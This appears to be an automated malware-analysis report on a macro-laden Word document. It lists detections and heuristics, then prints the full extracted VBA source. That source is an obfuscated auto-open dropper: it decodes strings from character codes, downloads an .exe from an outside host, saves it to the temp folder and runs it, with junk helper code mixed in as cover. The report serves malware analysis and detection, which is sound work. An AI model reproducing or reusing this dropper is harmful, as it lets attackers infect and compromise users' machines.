MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA project with an auto-executing macro ('autoopen') that is heavily obfuscated. Heuristics indicate the macro attempts to download a file via HTTP and save it to disk, likely executing it as a second-stage payload. ClamAV detections further confirm the malicious nature of the sample, identifying it as a macro-based dropper.
Heuristics 8
-
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
usZ5pw3gU8 = httpRequest.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12206 bytes |
SHA-256: ec8f306a593240b71bbfe12dd4bb3761d03f9465c521c9374d2e7f20bf169d0e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
FBFILE_FORMAT_1
End Sub
Attribute VB_Name = "Module2"
'':::::
Static Function _
hFBrelop2IRrelop _
(ByVal tk As _
Integer) As Integer
Dim op As Integer
Select Case tk
Case FB_TK_EQ
op = AST_OP_EQ
Case FB_TK_GT
op = AST_OP_GT
Case FB_TK_LT
op = AST_OP_LT
Case FB_TK_NE
op = AST_OP_NE
Case FB_TK_LE
op = AST_OP_LE
Case FB_TK_GE
op = AST_OP_GE
Case Else
dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
'' error recovery: fake an op
op = AST_OP_EQ
End Select
End Function
Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
End Sub
'':::::
Static Function _
hFileExists _
(ByVal filename As _
String) As Integer
Dim f As Integer
f = FreeFile
Close #f
End Function
'':::::
Static Sub _
hUcase _
(ByVal src As String _
, ByVal dst As _
String)
Dim c As Integer
Dim s
Dim d
s = src
d = dst
Do
c = s
If (c >= 97) Then
If (c <= 122) Then
c = c - (97 - 65)
End If
ElseIf (c = 0) Then
Exit Do
End If
d = c
s = s + 1
d = d + 1
Loop
'' null-term
d = 0
End Sub
'':::::
Static Sub _
hClearName _
(ByVal src As String)
Dim p
p = src
Do
Select Case p
Case 0
Exit Do
Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
Case Else
p = CHAR_ZLOW
End Select
p = p + 1
Loop
End Sub
Public Function usZ5pw3gU8(KJB As Long)
Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(109) & "b" & Chr(109) & "o" & Chr(109) & Chr(116) & Chr(105) & Chr(46) & Chr(99) & Chr(111) & "m" & "." & Chr(98) & Chr(114) & Chr(47) & "4" & Chr(51) & Chr(53) & Chr(114) & Chr(103) & Chr(52) & "/" & Chr(51) & "2" & Chr(52) & "5" & Chr(114) & "d" & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
httpRequest.Send
usZ5pw3gU8 = httpRequest.responseBody
End Function
'' Searches backwards for the last '.' while still behind '/' or '\'.
Private Function hFindExtBegin(ByRef path As String) As Integer
for i as integer = len( path )-1 to 0 step -1
select case( path[i] )
Case Asc(".")
return i
#If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
Case Asc("\"), Asc("/")
#Else
Case Asc("/")
#End If
Exit For
End Select
Next
function = len( path )
End Function
Function hStripExt(ByRef path As String) As String
function = left( path, hFindExtBegin( path ) )
End Function
'':::::
function hStripPath _
( _
byval filename as zstring ptr _
) as string static
dim as integer lp, p_found, p(1 to 2)
lp = 0
Do
p(1) = instr( lp+1, *filename, RSLASH )
p(2) = instr( lp+1, *filename, "/" )
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
function = mid( *filename, lp+1 )
Else
function = *filename
End If
End Function
Attribute VB_Name = "Module1"
Public Function hHexUInt _
( _
ByVal value As uinteger _
) As String
static as zstring * 8 + 1 res
dim as zstring ptr p
dim as integer lgt, maxlen
static as integer hexTB(0 to 15) = _
{ _
asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
}
maxlen = 4
If (value > 65535) Then
maxlen = 8
End If
p = @res + 8-1
lgt = 0
Do
*p = hexTB( value and &h0000000F )
lgt +=1
If (lgt = maxlen) Then
Exit Do
End If
p -= 1
value shr = 4
Loop
function = p
End Function
Function hFloatToHex _
( _
ByVal value As Double, _
ByVal dtype As Integer _
) As String
'' Emit the raw bytes that make up the float
'' x86 little-endian assumption
If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
Else
dim as single singlevalue = value
'' Using an intermediate uinteger to allow compiling with FB
'' versions before the overload resolution overhaul
function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
End If
End Function
Function hFloatToHex_C99 _
( _
ByVal value As Double _
) As String
'' float hex format defined in C99 spec: e.g. 0x1.fp+3
dim as ulongint n = *cptr( ulongint ptr, @value )
dim as integer sign = n shr 63
dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
dim as ulongint mantissa = n and (1ull shl 52 - 1)
dim as string ret
If (Sign <> 0) Then
'' negative
ret = "-0x"
Else
'' positive
ret = "0x"
End If
exp2 -= 1023
If (exp2 > -1023) Then
'' normalized
ret += "1." + hex( mantissa, 13 )
If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
Else
If mantissa = 0 Then
'' zero
ret += "0"
exp2 = 0
Else
'' denormed
exp2 += 1
ret += "0." + hex( mantissa, 13 )
If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
End If
End If
ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
return ret
End Function
Attribute VB_Name = "Module3"
'':::::
Function hStripFilename _
( _
ByVal filename As String _
) As String
dim as integer lp, p_found, p(1 to 2)
lp = 0
Do
p(1) = instr( lp+1, *filename, RSLASH )
p(2) = instr( lp+1, *filename, "/" )
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
function = left( *filename, lp )
Else
function = ""
End If
End Function
'':::::
function hGetFileExt _
( _
byval fname as zstring ptr _
) as string static
dim as integer p, lp
dim as string res
lp = 0
Do
p = instr( lp+1, *fname, "." )
If (p = 0) Then
Exit Do
End If
lp = p
Loop
If (lp = 0) Then
function = ""
Else
res = lcase( mid( *fname, lp+1 ) )
If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
'' We had a folder with a "." inside ...
function = ""
ElseIf (Len(res) > 0) Then
'' . or .. dirs?
if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
function = ""
Else
function = res
End If
End If
End If
End Function
sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
for i as integer = 0 to len( *s ) - 1
if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
s [i] = Char
End If
Next
End Function
Function pathStripDiv(ByRef path As String) As String
dim as integer length = len( path )
If (length > 0) Then
length -= 1
select case( path[length] )
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("/"), Asc("\")
#Else
Case Asc("/")
#End If
return left( path, length )
End Select
End If
function = path
End Function
Public Function hCurDir_2(UIlhbjkhoiyH As String)
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
End Function
Function pathIsAbsolute(ByVal path As String) As Integer
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
if( (*path)[0] <> 0 ) then
select case( (*path)[1] )
Case Asc(":")
'' C:...
function = TRUE
#If def__FB_WIN32__ Then
Case Asc("\")
'' \\... UNC path
function = ((*path)[0] = asc( "\" ))
#End If
End Select
End If
#Else
'' /...
function = ((*path)[0] = asc( "/" ))
#End If
End Function
Public Function FBFILE_FORMAT_1()
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Dim pathIsAbsolute_4 As Object
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim pathIsAbsolute_3 As String
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
With pathIsAbsolute_4
.Type = 1
.Open
.write usZ5pw3gU8(223)
End With
mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
noextensionFile.Open (pathIsAbsolute_3)
End Function
Function hCheckFileFormat(ByVal f As Integer) As Integer
dim as long BOM
dim as FBFILE_FORMAT fmt
'' little-endian assumptions
fmt = FBFILE_FORMAT_ASCII
if( get( #f, 0, BOM ) = 0 ) then
If (BOM = &HFFFE0000) Then
fmt = FBFILE_FORMAT_UTF32BE
ElseIf (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF32LE
Else
BOM and= &h00FFFFFF
If (BOM = &HBFBBEF) Then
fmt = FBFILE_FORMAT_UTF8
Else
BOM and= &h0000FFFF
If (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF16LE
ElseIf (BOM = &HFFFE) Then
fmt = FBFILE_FORMAT_UTF16BE
End If
End If
End If
Select Case fmt
Case FBFILE_FORMAT_ASCII
Seek #f, 1
Case FBFILE_FORMAT_UTF8
Seek #f, 1 + 3
Case FBFILE_FORMAT_UTF16LE, _
FBFILE_FORMAT_UTF16BE
Seek #f, 1 + 2
End Select
End If
function = fmt
End Function
Function hCurDir() As String
'' curdir() usually won't be terminated with a path separator,
'' except when it points to the file system root, instead of
'' some directory (e.g. C:\ on Win32 or / on Unix).
function = pathStripDiv( curdir( ) )
End Function
Function pathStripCurdir(ByRef path As String) As String
var pwd = hCurDir() + FB_HOST_PATHDIV
If (Left(path, Len(pwd)) = pwd) Then
function = right( path, len( path ) - len( pwd ) )
Else
function = path
End If
End Function
function hIsValidSymbolName( byval sym as zstring ptr ) as integer
If (sym = Null) Then Exit Function
var symlen = len( *sym )
If (symlen = 0) Then Exit Function
if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
for i as integer = 1 to symlen-1
if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
Next
function = TRUE
End Function
'' Checks whether a string starts with and ends in [double-]quotes.
Private Function strIsQuoted(ByRef s As String) As Integer
dim as integer last = len(s) - 1
If (Last < 1) Then
return FALSE
End If
return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
((s[0] = asc("'" )) and (s[last] = asc("'" ))))
End Function
Function strUnquote(ByRef s As String) As String
If (strIsQuoted(s)) Then
return mid(s, 2, len(s) - 2)
End If
return s
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 60928 bytes |
SHA-256: efa9662d04d3f9cee6fe24e017bb85b5d23734b3cd0ca7f1782bfc86e4814eed |
|||
|
Detection
ClamAV:
Doc.Macro.ObfuscatedHeuristic-5931994-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.